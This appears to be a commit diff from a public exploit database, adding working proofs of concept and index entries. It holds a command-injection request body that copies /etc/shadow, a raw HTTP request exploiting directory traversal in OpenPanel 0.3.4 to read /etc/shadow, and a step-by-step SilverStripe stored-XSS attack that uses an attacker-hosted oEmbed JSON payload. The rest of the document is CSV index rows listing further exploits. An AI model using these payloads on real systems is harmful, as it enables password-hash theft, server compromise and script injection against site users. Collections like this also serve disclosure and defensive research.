Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt

View file

@ -0,0 +1,22 @@
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

View file

@ -0,0 +1,55 @@
# Exploit Title: SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 2025-01-15
# Exploit Author: James Nicoll
# Vendor Homepage: https://www.silverstripe.org/
# Software Link: https://www.silverstripe.org/download/
# Category: Web Application
# Version: 5.2.22
# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04
# CVE : CVE-2024-47605
## Explanation:
When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website.
## Requirements
1. A Silverstripe CMS website.
2. Valid login credentials for a user with page edit rights.
3. An attacker server hosting malicious payload.
## On the attacker server:
1. Create an html file with oembded information:
```
<html>
<head>
<link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" />
</head>
<body>
<img src="media.jpg">
</body>
</html>
```
2. Create the json file with XSS payload:
```
{
"title": "Title",
"author_name": "author",
"type": "video",
"height": 113,
"width": 200,
"version": "1.0",
"provider_name": "FakeSite",
"thumbnail_height": 360,
"thumbnail_width": 480,
"thumbnail_url": "http://<attacker_server_ip>/media.jpg",
"html":"<script>alert('hello world');</script>"
}
```
3. The media.jpg file can be any image.
4. Host these files on a publicly available website
## On the SilverStripe website:
1. Log into the admin portal with a user account that has page editor rights (or higher).
2. Select the page you wish to load the malicious content into.
3. Within the editor panel, select the "Insert Media via URL" button.
4. Enter the IP/Hostname of the attacker server.
5. Click Add Media, Insert Media, and then save and publish the page.

View file

@ -10406,6 +10406,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,,
52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-13,0,CVE-2024-33896,,,,,
52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,,
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
@ -10916,6 +10917,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23136,exploits/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,remote,multiple,,2003-09-10,2012-12-04,1,OSVDB-2531,,,,,https://www.securityfocus.com/bid/8583/info
35805,exploits/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",remote,multiple,,2011-05-28,2015-01-17,1,,,,,,https://www.securityfocus.com/bid/48030/info
35792,exploits/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 - File Transfer Cross-Site Scripting",2011-05-24,"Kacper Szczesniak",remote,multiple,,2011-05-24,2015-01-15,1,,,,,,https://www.securityfocus.com/bid/47957/info
52200,exploits/multiple/remote/52200.txt,"GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50858,,,,,
52203,exploits/multiple/remote/52203.txt,"GestioIP 3.5.7 - Cross-Site Scripting (XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50857,,,,,
52202,exploits/multiple/remote/52202.txt,"GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50859,,,,,
52204,exploits/multiple/remote/52204.txt,"GestioIP 3.5.7 - Remote Command Execution (RCE)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-48760,,,,,
52201,exploits/multiple/remote/52201.txt,"GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)",2025-04-14,"Maximiliano Belino",remote,multiple,,2025-04-14,2025-04-14,0,CVE-2024-50861,,,,,
41684,exploits/multiple/remote/41684.rb,"GIT 1.8.5.6/1.9.5/2.0.5/2.1.4/2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit)",2014-12-18,Metasploit,remote,multiple,,2017-03-23,2017-03-23,1,CVE-2013-0758;CVE-2013-0757,,,,,https://github.com/rapid7/metasploit-framework/blob/1d617ae3894222cfbbf6951fcd68fd2d1c1b15c6/modules/exploits/multi/http/git_client_command_exec.rb
33990,exploits/multiple/remote/33990.rb,"Gitlist - Remote Command Execution (Metasploit)",2014-07-07,Metasploit,remote,multiple,80,2014-07-07,2014-07-08,1,CVE-2014-4511;OSVDB-108504;CVE-2013-7392,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-08-at-64236-pm.png,http://www.exploit-db.comgitlist-0.4.0.tar.gz,
33929,exploits/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,remote,multiple,,2014-06-30,2014-07-08,1,CVE-2014-5023;OSVDB-108504;OSVDB-108503;CVE-2014-4511;CVE-2013-7392,,,http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-08-at-62343-pm.png,http://www.exploit-db.comgitlist-0.4.0.tar.gz,
@ -12182,6 +12188,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,,2021-01-27,2021-03-18,1,,,,,,
49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,,2021-02-11,2021-03-18,1,,,,,,
49649,exploits/multiple/webapps/49649.txt,"openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting",2021-03-15,"Hosein Vita",webapps,multiple,,2021-03-15,2021-03-16,0,CVE-2021-27695,,,,,
52195,exploits/multiple/webapps/52195.txt,"OpenPanel 0.3.4 - Directory Traversal",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53537,,,,,
52196,exploits/multiple/webapps/52196.txt,"OpenPanel 0.3.4 - Incorrect Access Control",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53582,,,,,
52197,exploits/multiple/webapps/52197.txt,"OpenPanel 0.3.4 - OS Command Injection",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53584,,,,,
52198,exploits/multiple/webapps/52198.txt,"OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal",2025-04-14,"Korn Chaisuwan_ Charanin Thongudom_ Pongtorn Angsuchotmetee",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-53582,,,,,
46118,exploits/multiple/webapps/46118.txt,"OpenSource ERP 6.3.1. - SQL Injection",2019-01-10,"Emre ÖVÜNÇ",webapps,multiple,80,2019-01-10,2019-01-10,0,CVE-2019-5893,"SQL Injection (SQLi)",,,http://www.exploit-db.comerp_6.3.1.exe,
38640,exploits/multiple/webapps/38640.rb,"OpenSSL - Alternative Chains Certificate Forgery",2015-11-05,"Ramon de C Valle",webapps,multiple,,2015-11-05,2015-11-05,0,CVE-2015-1793;OSVDB-124300,,,,,
49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",2021-02-19,"Kamil Breński",webapps,multiple,,2021-02-19,2021-02-19,0,,,,,,
@ -12239,7 +12249,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,,
52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,,
35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,,
50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,,
34136,exploits/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",webapps,multiple,,2010-06-21,2014-07-22,1,,,,,,https://www.securityfocus.com/bid/40813/info
@ -12309,6 +12321,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,webapps,multiple,,2015-04-21,2015-04-21,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1314
51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
52035,exploits/multiple/webapps/52035.txt,"Sitefinity 15.0 - Cross-Site Scripting (XSS)",2024-06-03,"Aldi Saputra Wahyudi",webapps,multiple,,2024-06-03,2024-06-03,0,CVE-2023-27636,,,,,
@ -12453,6 +12466,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
11404,exploits/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection",2010-02-11,s4squatch,webapps,multiple,80,2010-02-10,,1,,,,,,
33578,exploits/multiple/webapps/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,webapps,multiple,,2009-07-16,2017-07-19,1,,,,,http://www.exploit-db.comxampp-win32-1.6.8.exe,https://www.securityfocus.com/bid/37999/info
10170,exploits/multiple/webapps/10170.txt,"Xerver 4.31/4.32 - HTTP Response Splitting",2009-11-18,s4squatch,webapps,multiple,80,2009-11-17,,1,CVE-2009-4086;OSVDB-60657,,,,http://www.exploit-db.comxerver_432.zip,
52192,exploits/multiple/webapps/52192.py,"Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection",2025-04-14,hyp3rlinx,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2019-19245,,,,,
49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info
49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,,

Can't render this file because it is too large.